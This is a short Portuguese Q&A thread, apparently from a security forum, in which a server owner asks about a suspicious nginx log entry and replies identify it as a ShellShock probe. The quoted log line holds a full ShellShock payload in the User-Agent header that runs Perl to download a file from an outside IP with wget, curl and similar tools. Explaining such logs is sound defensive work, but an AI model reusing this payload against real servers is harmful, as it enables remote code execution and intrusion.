Havia algumas entradas abaixo no log de acesso do nginx. Como eu sei o resultado desses scripts e se meu servidor está comprometido ou não?
162.232.183.48 - - [14/Jan/2016:10:54:57 +0000] "GET /cgi-bin/php4 HTTP/1.1" 200 1494 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://2
04.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232
.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \x22);'" "-"
Observe a sequência mágica () { :; }; . Eles estão tentando investigar e ver se o seu servidor está vulnerável à exploração do ShellShock . Perl é usado aqui para imprimir e ver se o ataque foi bem sucedido.
Teste se o seu servidor é vulnerável ao ShellShock . Se não for, você é claro.
Veja também: Meu servidor está vulnerável a uma exploração perl?
Ele está procurando fazer shellshock contra você. O engraçado é que ele configurou mal o seu ataque. Eu faço captura de malware e seu wget / fetch / etc falha porque seu pacote não está lá: -)